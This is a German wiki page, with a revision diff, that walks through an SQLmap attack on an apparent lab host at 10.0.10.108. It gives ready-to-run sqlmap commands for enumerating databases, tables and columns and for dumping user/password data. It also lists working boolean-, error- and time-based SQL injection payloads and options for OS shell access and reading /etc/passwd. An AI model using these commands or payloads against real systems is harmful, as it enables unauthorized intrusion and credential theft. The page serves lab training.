SQLmap Workflow: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 34: | Zeile 34: | ||
* Erkenntnis: Übersicht aller vorhandenen Datenbanken (z. B. '''verwaltung''', '''information_schema'''). | * Erkenntnis: Übersicht aller vorhandenen Datenbanken (z. B. '''verwaltung''', '''information_schema'''). | ||
| − | + | ;Tabellen in der Datenbank 'verwaltung' | |
| − | * '''sqlmap -u "http://10.0.10.108/sql-blind.php" --data="username=test" -D verwaltung --tables''' | + | * Befehl: '''sqlmap -u "http://10.0.10.108/sql-blind.php" --data="username=test" -D verwaltung --tables''' |
| − | * Erkenntnis: | + | * Erkenntnis: SQLmap meldete keine Tabellen. |
| + | * Bewertung: Möglicherweise False Negative aufgrund der Blind-Injection und Limitierungen der Abfrage. | ||
| + | * Schlussfolgerung: Weitere Tests (z. B. mit erweiterten Optionen wie --time-sec oder --hex) wären erforderlich, um die Tabellen zuverlässig zu enumerieren. | ||
== 5. Spalten in einer Tabelle auflisten == | == 5. Spalten in einer Tabelle auflisten == | ||
Version vom 15. September 2025, 17:30 Uhr
SQLmap Workflow
- Einleitung
SQLmap automatisiert die Ausnutzung von SQL-Injection-Schwachstellen. Der Ablauf erfolgt schrittweise: erst Bestätigung, dann systematische Informationsgewinnung.
Test auf Verwundbarkeit
- sqlmap -u "http://10.0.10.108/sql-blind.php" --data="username=test" --batch
Erkenntnisblock
[13:13:17] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian web application technology: Apache 2.4.62 back-end DBMS: MySQL >= 5.0 (MariaDB fork)
Gefundene Verwundbarkeiten
| Parameter | Technik | Beschreibung | Beispiel-Payload |
|---|---|---|---|
| username (POST) | Boolean-based blind | Antwort ändert sich abhängig von TRUE/FALSE | username=test' RLIKE (SELECT (CASE WHEN (1=1) THEN 0x74657374 ELSE 0x28 END))-- |
| username (POST) | Error-based | Erzwingt DB-Fehler und leakt Infos | username=test' AND (SELECT COUNT(*),CONCAT((SELECT version()),FLOOR(RAND(0)*2))x FROM information_schema.plugins GROUP BY x) |
| username (POST) | Time-based blind | Antwortzeit verzögert durch SLEEP() | username=test' AND (SELECT SLEEP(5))-- |
Version und Banner auslesen
- sqlmap -u "http://10.0.10.108/sql-blind.php" --data="username=test" --banner
- Erkenntnis: Exakte Version des Datenbanksystems wird angezeigt.
Datenbanken auflisten
- sqlmap -u "http://10.0.10.108/sql-blind.php" --data="username=test" --dbs
- Erkenntnis: Übersicht aller vorhandenen Datenbanken (z. B. verwaltung, information_schema).
- Tabellen in der Datenbank 'verwaltung'
- Befehl: sqlmap -u "http://10.0.10.108/sql-blind.php" --data="username=test" -D verwaltung --tables
- Erkenntnis: SQLmap meldete keine Tabellen.
- Bewertung: Möglicherweise False Negative aufgrund der Blind-Injection und Limitierungen der Abfrage.
- Schlussfolgerung: Weitere Tests (z. B. mit erweiterten Optionen wie --time-sec oder --hex) wären erforderlich, um die Tabellen zuverlässig zu enumerieren.
5. Spalten in einer Tabelle auflisten
- sqlmap -u "http://10.0.10.108/sql-blind.php" --data="username=test" -D verwaltung -T my_auth --columns
- Erkenntnis: Spaltennamen sichtbar, z. B. user, pass.
6. Daten exfiltrieren
- sqlmap -u "http://10.0.10.108/sql-blind.php" --data="username=test" -D verwaltung -T my_auth -C user,pass --dump
- Erkenntnis: Klaretextdaten der Benutzer (User/Passwort) liegen vor.
7. Optional: Weitere Möglichkeiten
- --os-shell → Versuch, Betriebssystembefehle auszuführen
- --file-read=/etc/passwd → Datei auf dem Server auslesen
- Erkenntnis: Eskalation möglich, wenn DB-User ausreichende Rechte hat.
Fazit
SQLmap liefert einen strukturierten Weg: Von der Bestätigung der Schwachstelle über die Datenbank- und Tabellenstruktur bis zur Exfiltration der Daten. Jeder Schritt bringt eine konkrete Erkenntnis und baut auf dem vorigen auf.